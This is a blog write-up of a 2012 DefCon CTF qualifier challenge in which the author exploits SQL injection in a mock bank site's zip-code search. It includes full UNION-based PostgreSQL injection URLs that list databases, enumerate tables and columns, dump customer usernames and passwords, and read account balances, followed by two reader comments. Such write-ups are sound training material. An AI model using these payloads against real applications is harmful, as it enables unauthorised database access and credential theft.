DefCon CTF Quals GrabBag400 Writeup

- Rajat

Posted on Jun 3, 2012 in HowTo | 2 comments

ctf defcon postgresql quals sql injection

This was an interesting PostgreSQL injection challenge.
What is Jeff Moss’ checking account balance?
Bank Site – http://140.197.217.85:8080/boa_bank
User:blacksheep
Password:luvMeSomeSheep

The username and password is to get around the .htaccess that protects the site. There was a page with the zip code search on it. The zip parameter was vulnerable to SQL injection (verified by entering a ‘ character in the zip parameter). With this information you

SQL injection in zip parameter. http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20or%201=1–&Submit.x=0&Submit.y=0

List of databases can be found by: http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20datname,datname,datname,datname,1,datname%20FROM%20pg_database&Submit.x=0&Submit.y=0

Names of databases
——————
template1
template0
postgres
boa_bank

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20relname,A.attname,relname,A.attname,1,relname%20FROM%20pg_class%20C,pg_namespace%20N,pg_attribute%20A,pg_type%20T%20WHERE%20(C.relkind=’r’)%20AND%20(N.oid=C.relnamespace)%20AND%20(A.attrelid=C.oid)%20AND%20(A.atttypid=T.oid)%20AND%20(A.attnum%3E0)%20AND%20(NOT%20A.attisdropped)%20AND%20(N.nspname%20ILIKE%20’public’)&Submit.x=0&Submit.y=0

With this query it’s easy to evaluate the type of the parameter as well as the position. This was done by the error message that indicated an “int cannot be compared to text”.

Table,column_name
—————–
transaction,amount
transaction,account
transaction,id
transaction,date
branch,id
branch,zip
branch,city
branch,name
branch,street
branch,phone
branch,state
customer,id
customer,firstname
customer,password
customer,lastname
customer,username
customer,email
account,id -> int
account,owner -> int
account,account -> string
account,balance
account,type -> checking/savings
sqlmapfile,data
test2234,t
hkk,t
mydata,t
mytable,mycol
hk,hk
sonic,sonic

Getting all customers (Jeff Moss can’t be found in the list though)
http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20C.firstname,C.lastname,C.username,C.password,1,C.email%20FROM%20customer%20C&Submit.x=0&Submit.y=0
Lots of complaints were heard that the record wasn’t present for Jeff Moss. But if you just filtered by ‘checking’ account, you would see that it was all the same for all users. The following query gives the list of all checking accounts…but if you notice the value is $0.00 for all checking accounts so Jeff Moss’ account should be 0.00 too!!!

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=5%20%20union%20SELECT%20A.account,A.type,A.type,cast(A.balance%20as%20text),A.owner,A.account%20FROM%20account%20A%20where%20A.type%20ILIKE%20’checking’&Submit.x=0&Submit.y=0

Fun times!

Community Answers

6-3-12

B@rmaley.e> says:

If you google for ‘Jeff Moss’, you can find an article on Wikipedia about him: http://en.wikipedia.org/wiki/Jeff_Moss_(hacker)
> Jeff Moss, also known as The Dark Tangent…
And there is a user with lastname == ‘Tangent’: http://s40.radikal.ru/i088/1206/2c/24d05de088cc.png (his password contains < symbol, so it isnt displayed correctly)


+186
Was this answer helpful?
Like Dislike
6-9-12

Commentor says:

“Jeff Moss” wasn’t an available account name, but “Dark Tangent” was. Any defcon attendee should know that the Dark Tangent is Jeff Moss, who is also the organizer of defcon.

It’s also available information in the first 10 words or so of a google search for “Jeff Moss”


+283
Was this answer helpful?
Like Dislike